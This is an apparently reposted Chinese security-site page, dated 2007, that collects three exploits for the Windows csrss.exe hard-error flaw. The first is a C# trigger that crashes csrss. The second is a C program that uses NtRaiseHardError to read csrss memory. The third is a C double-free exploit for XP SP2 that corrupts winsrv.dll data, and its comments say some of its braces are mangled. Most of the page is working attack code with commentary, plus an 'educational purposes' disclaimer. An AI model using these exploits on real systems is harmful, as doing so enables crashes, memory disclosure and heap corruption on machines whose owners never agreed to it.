[推荐]Microsoft Windows Csrss HardError消息多个安全漏洞

Microsoft Windows Csrss HardError消息多个安全漏洞

文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2007-1-5 8:31:56

// mbox.cs
using System;
using System.Runtime.InteropServices;
// Minimal trigger for the csrss.exe hard-error flaw this page is about.
//
// MessageBoxA is called with MB_SERVICE_NOTIFICATION, which hands the box to
// csrss.exe instead of drawing it in-process (the C listings further down
// reach the same csrss code path by calling NtRaiseHardError directly).
// Both the text and the caption are the bytes "\??\!!!"; the "\??\" prefix is
// the same one the double-free exploit below puts at the front of its payload,
// so it is presumably what steers csrss onto the vulnerable path — confirm
// against the original advisory. Expect csrss.exe to crash (and the session
// to go down with it) on an affected host; run only in a throw-away VM.
//
// Build: csc /unsafe mbox.cs  (unsafe is needed for the byte* marshalling).
class HelloWorldFromMicrosoft
{
// Raw P/Invoke signature: byte* rather than string so the exact bytes,
// including the terminating 0x00, are passed through unchanged.
// hwnd is a uint here, which only holds a full handle on 32-bit Windows.
[DllImport("user32.dll")]
unsafe public static extern int MessageBoxA(uint hwnd, byte* lpText, byte* lpCaption, uint uType);

static unsafe void Main()
{
// "\??\!!!" followed by the NUL terminator.
byte[] helloBug = new byte[] {0x5C, 0x3F, 0x3F, 0x5C, 0x21, 0x21, 0x21, 0x00};
uint MB_SERVICE_NOTIFICATION = 0x00200000u;
// fixed pins the array so pHelloBug stays valid for the whole loop.
fixed(byte* pHelloBug = &helloBug[0])
{
// Ten boxes in a row; the original gives no reason for the count.
for(int i=0; i<10; i++)
MessageBoxA(0u, pHelloBug, pHelloBug, MB_SERVICE_NOTIFICATION);
}
}
}
// >> csc /unsafe mbox.cs
// >> mbox.exe

==========================================================================

/////////////////////////////////////////
/////////////////////////////////////////
///// Microsoft Windows NtRaiseHardError 
///// Csrss.exe memory disclosure 
/////////////////////////////////////////
///// Ruben Santamarta 
///// ruben at reversemode dot com
///// www.reversemode.com 
/////////////////////////////////////////
///// 12.27.2006
///// For educational purposes ONLY
///// Compiled using gcc (Dev-C++)
////////////////////////////////////////

#include <stdio.h>
#include <windows.h>
#include <winbase.h>
#include <ntsecapi.h>


// NOTE: defined after <windows.h> was already included, so it has no effect
// on the API names used below: FindWindow/GetWindowText/etc. resolve to their
// ANSI versions, which is consistent with the narrow "#32770"/"static"
// strings the code passes.
#define UNICODE
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
#define STATUS_SUCCESS ((NTSTATUS) 0x00000000)
// Returned by NtQuerySystemInformation when the caller's buffer is too small.
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS) 0xC0000004)
#define STATUS_INVALID_PARAMETER ((NTSTATUS) 0xC000000D)   // not used below
// SYSTEM_INFORMATION_CLASS value for the process + thread list.
#define SystemProcessesAndThreadsInformation 5
#define NTAPI __stdcall

// Length of the last message-box title captured by the ReadBox thread.
// main() reads it to decide how many bytes to advance the csrss address it
// is reading. Shared between two threads with no synchronization.
int gLen=1;


// ntdll!NtRaiseHardError. Parameter meaning, per the usual (undocumented)
// prototype: ErrorStatus, NumberOfParameters, UnicodeStringParameterMask,
// Parameters, ValidResponseOptions, Response. The mask marks which entries
// of Parameters csrss should capture as UNICODE_STRINGs from the caller.
// NTSTATUS is used here before the typedef below, so it must already come
// from <ntsecapi.h> on the toolchain the author used.
typedef NTSTATUS (WINAPI *PNTRAISE)(NTSTATUS, 
ULONG,
ULONG,
PULONG,
UINT,
PULONG); 


// Redeclarations of types that <ntsecapi.h> normally provides; kept as
// published, but they may trip a stricter compiler as duplicate typedefs.
typedef LONG NTSTATUS;
typedef LONG KPRIORITY;

// Process/thread id pair, hand-declared for the 32-bit layout (DWORD rather
// than HANDLE-sized fields).
typedef struct _CLIENT_ID {
DWORD UniqueProcess;
DWORD UniqueThread;
} CLIENT_ID, * PCLIENT_ID;


// Per-process memory counters as embedded in SYSTEM_PROCESS_INFORMATION.
// Only used to get the field offsets right; none of these values are read.
typedef struct _VM_COUNTERS {
SIZE_T PeakVirtualSize;
SIZE_T VirtualSize;
ULONG PageFaultCount;
SIZE_T PeakWorkingSetSize;
SIZE_T WorkingSetSize;
SIZE_T QuotaPeakPagedPoolUsage;
SIZE_T QuotaPagedPoolUsage;
SIZE_T QuotaPeakNonPagedPoolUsage;
SIZE_T QuotaNonPagedPoolUsage;
SIZE_T PagefileUsage;
SIZE_T PeakPagefileUsage;
} VM_COUNTERS;


// One thread entry of the NtQuerySystemInformation(5) snapshot.
// StartAddress is the only field the exploit uses: a csrss thread's start
// address is an address known to be mapped inside csrss, and is used as the
// first location to read through the hard-error flaw.
typedef struct _SYSTEM_THREAD_INFORMATION {
LARGE_INTEGER KernelTime;
LARGE_INTEGER UserTime;
LARGE_INTEGER CreateTime;
ULONG WaitTime;
PVOID StartAddress;
CLIENT_ID ClientId;
KPRIORITY Priority;
KPRIORITY BasePriority;
ULONG ContextSwitchCount;
LONG State;
LONG WaitReason;
} SYSTEM_THREAD_INFORMATION, * PSYSTEM_THREAD_INFORMATION;

 

// One process entry of the NtQuerySystemInformation(5) snapshot, hand-declared
// in the 32-bit layout of the time (ProcessName is what <winternl.h> calls
// ImageName). Entries are variable-sized and chained by NextEntryDelta
// (0 on the last one). Threads[5] is a fixed-size convenience: the real
// number of thread entries that follow is ThreadCount, so indexing past
// ThreadCount reads into the next process's entry, not into this one.
typedef struct _SYSTEM_PROCESS_INFORMATION {
ULONG NextEntryDelta;
ULONG ThreadCount;
ULONG Reserved1[6];
LARGE_INTEGER CreateTime;
LARGE_INTEGER UserTime;
LARGE_INTEGER KernelTime;
UNICODE_STRING ProcessName;
KPRIORITY BasePriority;
ULONG ProcessId;
ULONG InheritedFromProcessId;
ULONG HandleCount;
ULONG Reserved2[2];
VM_COUNTERS VmCounters;
IO_COUNTERS IoCounters;
SYSTEM_THREAD_INFORMATION Threads[5];
} SYSTEM_PROCESS_INFORMATION, * PSYSTEM_PROCESS_INFORMATION;

 

// ntdll!NtQuerySystemInformation(SystemInformationClass, Buffer, Length, ReturnLength).
typedef DWORD (WINAPI* PQUERYSYSTEM)(UINT, PVOID, DWORD,PDWORD);


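// GetCsrssThread - find csrss.exe in the NtQuerySystemInformation(5) process
// list and return an address known to be mapped inside it: the StartAddress
// of its thread #1. main() uses that value as the first csrss address to
// read through NtRaiseHardError.
//
// Returns 0 if NtQuerySystemInformation cannot be resolved, the query fails,
// memory runs out, or no csrss.exe with at least two threads is found. (The
// published listing returned an uninitialized value in those cases and, on a
// query error, went on using the buffer it had just freed.)
//
// Assumptions: the hand-declared 32-bit SYSTEM_PROCESS_INFORMATION layout
// above; entries chained by NextEntryDelta with 0 on the last one (the last
// entry is examined too - the original broke before looking at it); and a
// NUL-terminated ProcessName.Buffer, since wcsicmp ignores the
// UNICODE_STRING Length (Length would be the safer bound).
//
// Text repairs relative to the published listing: the '+' in the entry
// advance, the "Thread %d -> 0x%x\n" literal that was split across two lines,
// and the closing braces that were lost.
ULONG GetCsrssThread()
{
    ULONG cbBuffer = 0x5000;
    ULONG tPointer = 0;
    LPVOID pBuffer = NULL;
    NTSTATUS Status = STATUS_SUCCESS;
    int b;

    PQUERYSYSTEM NtQuerySystemInformation;
    PSYSTEM_PROCESS_INFORMATION pInfo;

    NtQuerySystemInformation = (PQUERYSYSTEM) GetProcAddress(
        LoadLibrary( "ntdll.dll" ), "NtQuerySystemInformation" );
    if (NtQuerySystemInformation == NULL)
    {
        printf("NtQuerySystemInformation not found in ntdll.dll\n");
        return 0;
    }

    // Grow the buffer until the whole snapshot fits.
    do
    {
        pBuffer = malloc(cbBuffer);
        if (pBuffer == NULL)
        {
            printf("Not enough memory\n");
            return 0;
        }

        Status = NtQuerySystemInformation(
            SystemProcessesAndThreadsInformation,
            pBuffer, cbBuffer, NULL);

        if (Status == STATUS_INFO_LENGTH_MISMATCH)
        {
            free(pBuffer);
            pBuffer = NULL;
            cbBuffer *= 2;
        }
        else if (!NT_SUCCESS(Status))
        {
            printf("NtQuerySystemInformation Error! ");
            free(pBuffer);
            return 0;
        }
    } while (Status == STATUS_INFO_LENGTH_MISMATCH);

    pInfo = (PSYSTEM_PROCESS_INFORMATION)pBuffer;

    for (;;)
    {
        if (pInfo->ProcessName.Buffer != NULL &&
            !wcsicmp(pInfo->ProcessName.Buffer, L"csrss.exe"))
        {
            printf("\n[%ws] \n\n", pInfo->ProcessName.Buffer);
            printf("5 addresses for testing purposes\n\n");

            // Threads[] has 5 declared slots but only ThreadCount real entries.
            for (b = 0; b < 5 && (ULONG)b < pInfo->ThreadCount; b++)
                printf("Thread %d -> 0x%x\n", b, pInfo->Threads[b].StartAddress);

            if (pInfo->ThreadCount > 1)
                tPointer = (ULONG)pInfo->Threads[1].StartAddress;
            // No break, as in the original: with several csrss.exe instances
            // (one per session) the last one listed wins.
        }

        if (pInfo->NextEntryDelta == 0)
            break;
        pInfo = (PSYSTEM_PROCESS_INFORMATION)(((PUCHAR)pInfo) + pInfo->NextEntryDelta);
    }

    free(pBuffer);
    return tPointer;
}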

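// ReadBox - monitor thread for the memory-disclosure loop in main().
//
// Every 800 ms it looks for a dialog of class "#32770" - the hard-error
// message box csrss puts up for each NtRaiseHardError call - reads its
// title, prints the title bytes as hex (this is the csrss memory at args[0]
// that the call leaked), publishes the title length in gLen so main()
// advances by that many bytes, and dismisses the box with WM_CLOSE.
//
// An empty title (a NUL byte at the address being read) yields gLen == 1,
// so main() steps one byte and prints "00"; the leak therefore proceeds one
// NUL-terminated string at a time.
//
// The message body is copied into lpText as well but never used; the window
// walk is kept only because the original performed it. gLen is a plain
// shared int with no synchronization, as in the original.
//
// Caution: any "#32770" dialog on the desktop matches, not only the
// exploit's own boxes, and gets closed.
//
// Declared VOID and cast to LPTHREAD_START_ROUTINE by the caller, as in the
// original; the proper thread signature would be DWORD WINAPI (LPVOID).
// Repairs: the opening brace lost in publication, and
// "lpText[0]=(BYTE)""" (a pointer truncated to one byte) replaced by clearing
// the buffers before they are read.
VOID WINAPI ReadBox( LPVOID param )
{
    HWND hWindow, hText;
    int i;
    int gTemp;
    char lpTitle[300];
    char lpText[300];

    (void)param;

    for (;;)
    {
        Sleep(800);

        hWindow = FindWindow("#32770", NULL);
        if (hWindow == NULL)
            continue;

        ZeroMemory(lpTitle, sizeof(lpTitle));
        ZeroMemory(lpText, sizeof(lpText));

        GetWindowText(hWindow, lpTitle, 250);

        // Same walk as the original: first "static" child, then its next
        // sibling; only the sibling's text survives in lpText (unused).
        hText = FindWindowEx(hWindow, 0, "static", 0);
        GetWindowText(hText, lpText, 250);
        hText = GetNextWindow(hText, GW_HWNDNEXT);
        GetWindowText(hText, lpText, 250);

        gTemp = (int)strlen(lpTitle);
        gLen = (gTemp > 1) ? gTemp : 1;

        for (i = 0; i < gTemp; i++)
            printf("%.2X", (BYTE)lpTitle[i]);

        SendMessage(hWindow, WM_CLOSE, 0, 0);
    }
}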

 


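// main - csrss.exe memory disclosure via NtRaiseHardError.
//
// How it works, as far as this listing shows: NtRaiseHardError is called
// with status 0x50000018 (STATUS_SERVICE_NOTIFICATION, the status user32
// uses for MB_SERVICE_NOTIFICATION boxes), three parameters and mask 4, so
// only the third parameter (&uStr) is captured from this process as a
// UNICODE_STRING. Parameters 0 and 1 are raw values - an address inside
// csrss obtained from GetCsrssThread() - and csrss appears to use them
// directly as the strings to display, so the box title shows csrss memory
// at args[0]. The ReadBox thread captures and prints that title, and the
// loop advances by its length (gLen) and repeats forever; stop it with
// Ctrl+C.
//
// uStr's odd {5,5,L"fun!"} lengths are the author's values and are kept.
//
// Changes vs. the published listing: &uStr is cast to ULONG instead of
// relying on an implicit pointer-to-integer conversion (the second exploit
// below already does this), and missing ntdll export / csrss lookup /
// thread creation now abort instead of continuing with garbage.
int main()
{
    UNICODE_STRING uStr = {5, 5, L"fun!"};
    ULONG retValue = 0;
    ULONG args[] = {0, 0, (ULONG)&uStr};
    ULONG csAddr;
    PNTRAISE NtRaiseHardError;

    system("cls");
    printf("##########################################\n");
    printf("### Microsoft Windows NtRaiseHardError ###\n");
    printf("##### Csrss.exe memory disclosure ######\n");
    printf("@@@@@ Xmas Exploit - ho ho ho! @@@@@@\n");
    printf("## Ruben Santamarta www.reversemode.com ##\n");
    printf("##########################################\n\n");

    NtRaiseHardError = (PNTRAISE)GetProcAddress(GetModuleHandle("ntdll.dll"),
                                                "NtRaiseHardError");
    if (NtRaiseHardError == NULL)
    {
        printf("[-] NtRaiseHardError not found in ntdll.dll\n");
        return 1;
    }

    csAddr = GetCsrssThread();
    if (csAddr == 0)
    {
        printf("[-] csrss.exe thread address not found\n");
        return 1;
    }

    // Both "string" parameters point at the same csrss address.
    args[0] = csAddr;
    args[1] = csAddr;
    printf("\n[+] Capturing Messages \n");

    if (CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)ReadBox, 0, 0, NULL) == NULL)
    {
        printf("[-] CreateThread failed\n");
        return 1;
    }

    printf("\n[+] Now reading at: [0x%p] - Thread 1\n\n", csAddr);

    for (;;)
    {
        printf("Reading bytes at [0x%p] : ", args[0]);
        NtRaiseHardError(0x50000018, 3, 4, args, 1, &retValue);

        // gLen <= 1 means ReadBox saw an empty title: a NUL at args[0].
        if (retValue && gLen <= 1) printf("00\n");
        else printf("\n");

        args[0] += gLen;
        args[1] += gLen;
    }
}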
=======================================================================

/////////////////////////////////////////
/////////////////////////////////////////
///// Microsoft Windows NtRaiseHardError 
///// Csrss.exe-winsrv.dll Double Free 
/////////////////////////////////////////
///// Ruben Santamarta 
///// ruben at reversemode dot com
///// www.reversemode.com 
/////////////////////////////////////////
///// 12.29.2006
///// For educational purposes ONLY
///// Compiled using gcc (Dev-C++)
////////////////////////////////////////
////// XP SP2
////////////////////////////////////////


#include <stdio.h>
#include <windows.h>
#include <winbase.h>
#include <ntsecapi.h>

// Defined after <windows.h> was included: no effect on the ANSI API names used below.
#define UNICODE
// An address in winsrv.dll's data section as mapped inside csrss.exe on the
// Windows XP SP2 build this was written for (see header). It is used both as
// the raw address passed to NtRaiseHardError for csrss to read, and, in its
// little-endian byte form "\x40\xcd\xb4\x75", as the value sprayed through
// the message-box text. It is build-specific: another winsrv.dll needs
// another value.
#define MAGIC_VALUE 0x75b4cd40 // winsrv.dll data section


// Set to TRUE by main() after stage 1 so the ReadBox thread stops closing
// message boxes and ReadBox2 can inspect them. Plain shared BOOL, no
// synchronization.
BOOL gFon=FALSE;

// NTSTATUS normally also comes from <ntsecapi.h>; redeclaration kept as published.
typedef LONG NTSTATUS;
// ntdll!NtRaiseHardError: ErrorStatus, NumberOfParameters,
// UnicodeStringParameterMask, Parameters, ValidResponseOptions, Response
// (names per the usual undocumented prototype).
typedef NTSTATUS (WINAPI *PNTRAISE)(NTSTATUS, 
ULONG,
ULONG,
PULONG,
UINT,
PULONG); 

// Csrss.exe memory monitor thread
// (Read csrss.exe memory disclosure exploit for details)

// ReadBox2 - stage-2 monitor thread of the double-free exploit.
//
// Once a second it looks for a "#32770" dialog (the hard-error box csrss
// raises for each NtRaiseHardError call in main()'s stage-2 loop). Dialogs
// titled "Aa" are skipped; why that title is special is not visible here
// (presumably a left-over box from stage 1, whose caption is "A") - check
// the original advisory. For any other box, the first four bytes of the
// message text (and, if those are zero, of the title) are taken as a
// little-endian DWORD read from winsrv.dll's data section inside csrss:
//   0x100000 < value < 0x400000  -> reported as a heap chunk address
//   any other non-zero value     -> "winsrv.dll data overwritten"
//   zero                         -> "nothing found"
// The box is then dismissed with WM_CLOSE.
//
// WARNING: the braces of this function were mangled when the listing was
// published and it does not compile as printed. Missing: the '{' after the
// signature, the '{' after each "if(cHeader >0x100000 && ...)" test, the
// '}' that closes each "if( cHeader!=0)" block before its "else", and the
// function's final '}'. Recover them from the original release before
// building; only comments were added here.
//
// Other points, kept as published:
//   - CloseHandle(hWindow) is applied to an HWND, which is not a kernel
//     handle; the call simply fails and is not needed after WM_CLOSE.
//   - hButton, hChunk, i, b and lpBuff are unused.
//   - *(DWORD*)lpText / *(DWORD*)lpTitle reinterpret a char buffer as a
//     32-bit value (x86-only, like the rest of the exploit).
//   - the 0x100000-0x400000 window is presumably where the csrss heap lives
//     on the tested XP SP2 system; it is not derived from anything here.
VOID WINAPI ReadBox2( LPVOID param ) 

HWND hWindow,hButton,hText;
DWORD hChunk,cHeader=0;
int i=0,b=0;
int gTemp;
char lpTitle[300];
char lpText[300];
char lpBuff[500];
ZeroMemory((LPVOID)lpTitle,250);
ZeroMemory((LPVOID)lpText,250);
ZeroMemory((LPVOID)lpBuff,300);
// Give stage 2 in main() time to start raising boxes.
Sleep(2000);

for (;;)
{

// Truncates a string-literal pointer to one byte; the intent is lpText[0] = '\0'.
lpText[0]=(BYTE)"";
Sleep(1000);
hWindow = FindWindow("#32770",NULL);
ZeroMemory((LPVOID)lpTitle,250);
ZeroMemory((LPVOID)lpText,250);
ZeroMemory((LPVOID)lpBuff,300);

if(hWindow != NULL)
{
GetWindowText(hWindow,(LPSTR)&lpTitle,250);

if(strcmp(lpTitle,"Aa")!=0)
{
// Same walk as the disclosure exploit's ReadBox: first "static" child,
// then its next sibling; lpText ends up holding the sibling's text.
hText=FindWindowEx(hWindow,0,"static",0);

GetWindowText(hText,(LPSTR)&lpText,250);
hText=GetNextWindow(hText,GW_HWNDNEXT);

GetWindowText(hText,(LPSTR)&lpText,250);

// First DWORD of the leaked csrss memory, read from the message text.
cHeader=*(DWORD*)lpText;
if( cHeader!=0)
{

if(cHeader >0x100000 && cHeader<0x400000)

printf("\n**************************\n");
printf("Heap Chunk Found! Good Luck!\n");
printf("New Value: 0x%p",cHeader);
printf("\n**************************\n");

}
else
{
printf("\n****************************\n");
printf("winsrv.dll data overwritten! \n");
printf("New Value: 0x%p",cHeader);
printf("\n****************************\n");

}

else
{
printf("\n****************************\n");
printf("nothing found! ");
printf("\n****************************\n");

// Message text was zero; try the title instead.
cHeader=*(DWORD*)lpTitle;
if( cHeader!=0)
{

if(cHeader >0x100000 && cHeader<0x400000)

printf("\n**************************\n");
printf("Heap Chunk Found! Good Luck!\n");
printf("New Value: 0x%p",cHeader);
printf("\n**************************\n");

}
else
{
printf("\n****************************\n");
printf("winsrv.dll data overwritten! \n");
printf("New Value: 0x%p",cHeader);
printf("\n****************************\n");

}

else
{
printf("\n****************************\n");
printf("nothing found! ");
printf("\n****************************\n");
}

}

SendMessage(hWindow,WM_CLOSE,0,0); 
ZeroMemory((LPVOID)lpTitle,250);
ZeroMemory((LPVOID)lpText,250);
ZeroMemory((LPVOID)lpBuff,300);
}
// Not a kernel handle: this call fails and has no effect.
CloseHandle(hWindow);
}

}

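// ReadBox - closes message boxes while the heap is being hit.
//
// During stage 1 (gFon == FALSE) it dismisses any "#32770" dialog it finds,
// once a second, so the seeding and double-free boxes do not pile up. After
// main() sets gFon the thread keeps running but does nothing, leaving the
// stage-2 boxes for ReadBox2 to read.
//
// Caution: while active it closes every "#32770" dialog on the desktop, not
// only the exploit's own. gFon is read without synchronization, as in the
// original. Declared VOID and cast by the caller, as in the original; the
// proper thread signature would be DWORD WINAPI (LPVOID).
// Repair: the opening brace was lost in publication.
VOID WINAPI ReadBox( LPVOID param )
{
    HWND hWindow;

    (void)param;

    for (;;)
    {
        Sleep(1000);
        if (gFon)
            continue;   // stage 2: ReadBox2 owns the dialogs now

        hWindow = FindWindow("#32770", NULL);
        if (hWindow != NULL)
            SendMessage(hWindow, WM_CLOSE, 0, 0);
    }
}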


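// main - csrss.exe / winsrv.dll double free, combined with the memory
// disclosure flaw to see whether it worked. Hard-wired to the XP SP2 build
// MAGIC_VALUE was taken from.
//
// Stages, as the code performs them:
//   seed    - two MB_SERVICE_NOTIFICATION boxes whose text and caption are
//             the little-endian bytes of MAGIC_VALUE;
//   stage 1 - eleven boxes whose text is "\??\" followed by MAGIC_VALUE
//             repeated 28 times (116 bytes). Per the banner, the intent is
//             that the double free in winsrv.dll makes csrss write into
//             controlled addresses in winsrv.dll's data section. A crash of
//             csrss.exe (and loss of the session) is the likely outcome on
//             an affected host when this goes wrong;
//   stage 2 - gFon stops the ReadBox closer thread, ReadBox2 starts, and 15
//             NtRaiseHardError calls read DWORDs from MAGIC_VALUE-0x1C up to
//             MAGIC_VALUE+0x18 inside csrss (args[0] -= 0x20, then += 4 per
//             call) using the same disclosure primitive as the first
//             exploit (status 0x50000018, mask 4: only &uStr is captured as
//             a string, parameters 0/1 are raw csrss addresses). ReadBox2
//             reports what it sees.
//
// Changes vs. the published listing: ShellCode is a const char* (a string
// literal was assigned to byte*), and a missing NtRaiseHardError export
// aborts instead of being called through NULL. Runtime strings are kept
// byte-for-byte, including "attemps".
int main()
{
    UNICODE_STRING uStr = {5, 5, L"fun!"};
    ULONG retValue = 0;
    ULONG args[] = {MAGIC_VALUE, MAGIC_VALUE, (ULONG)&uStr};
    PNTRAISE NtRaiseHardError;
    DWORD dwThreadId;
    int i;

    // "\??\" + MAGIC_VALUE (0x75b4cd40 little-endian) x 28.
    const char *ShellCode = "\x5C\x3F\x3F\x5C\x40\xcd\xb4\x75\x40\xcd\xb4\x75"
        "\x40\xcd\xb4\x75\x40\xcd\xb4\x75\x40\xcd\xb4\x75"
        "\x40\xcd\xb4\x75\x40\xcd\xb4\x75\x40\xcd\xb4\x75"
        "\x40\xcd\xb4\x75\x40\xcd\xb4\x75\x40\xcd\xb4\x75"
        "\x40\xcd\xb4\x75\x40\xcd\xb4\x75\x40\xcd\xb4\x75"
        "\x40\xcd\xb4\x75\x40\xcd\xb4\x75\x40\xcd\xb4\x75"
        "\x40\xcd\xb4\x75\x40\xcd\xb4\x75\x40\xcd\xb4\x75"
        "\x40\xcd\xb4\x75\x40\xcd\xb4\x75\x40\xcd\xb4\x75"
        "\x40\xcd\xb4\x75\x40\xcd\xb4\x75\x40\xcd\xb4\x75"
        "\x40\xcd\xb4\x75\x40\xcd\xb4\x75";

    NtRaiseHardError = (PNTRAISE)GetProcAddress(GetModuleHandle("ntdll.dll"),
                                                "NtRaiseHardError");
    if (NtRaiseHardError == NULL)
    {
        printf("[-] NtRaiseHardError not found in ntdll.dll\n");
        return 1;
    }

    system("cls");
    printf("##########################################\n");
    printf("### Microsoft Windows NtRaiseHardError ###\n");
    printf("### Csrss.exe-winsrv.dll Double-Free ###\n");
    printf("## Ruben Santamarta www.reversemode.com ##\n");
    printf("##########################################\n");
    printf("## + Csrss.exe Double-Free Exploit ##\n");
    printf("## + Csrss.exe Memory Disclosure Exploit##\n");
    printf("##########################################\n");
    printf("# XP SP 2 #\n");
    printf("##########################################\n\n");
    printf("\nThe exploit overwrites controlled addresses\n");
    printf("in winsrv.dll data section within Csrss.exe\n\n");

    // Closer thread: keeps the desktop clear of boxes during stage 1.
    CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)ReadBox, 0, 0, &dwThreadId);

    // Seeding the heap
    for (i = 0; i < 2; i++)
        MessageBoxA(0, "\x40\xcd\xb4\x75", "\x40\xcd\xb4\x75", MB_SERVICE_NOTIFICATION);

    // Exploiting Csrss.exe Double-Free
    printf("[*] Stage 1 -= Hitting Heap =-\n\n");
    printf("[+] Corrupting the heap (11 attemps)\n\n");

    for (i = 0; i < 11; i++)
    {
        printf("#%d... ", i + 1);
        MessageBoxA(0, ShellCode, "A", MB_SERVICE_NOTIFICATION);
    }

    // From here on boxes must stay open for ReadBox2 to read them.
    gFon = TRUE;

    printf("\n\n[*] Stage 2 -= Scanning winsrv.dll data section =-\n\n");
    Sleep(2000);

    CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)ReadBox2, 0, 0, NULL);

    args[0] -= 0x20;

    // Exploiting Csrss.exe memory disclosure flaw
    for (i = 0; i < 0xF; i++)
    {
        args[0] += 4;
        printf("\n#%d Reading at : [0x%p]\n", i, args[0]);
        NtRaiseHardError(0x50000018, 3, 4, args, 1, &retValue);
    }

    printf("\n[+] Exploit exiting\n\n");
    printf("#############################################################\n");
    printf("If you didn't find anything, run the exploit one more time!\n");
    printf("If you find a heap chunk address, enjoy!\n");
    printf("#############################################################\n");

    return 0;
}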
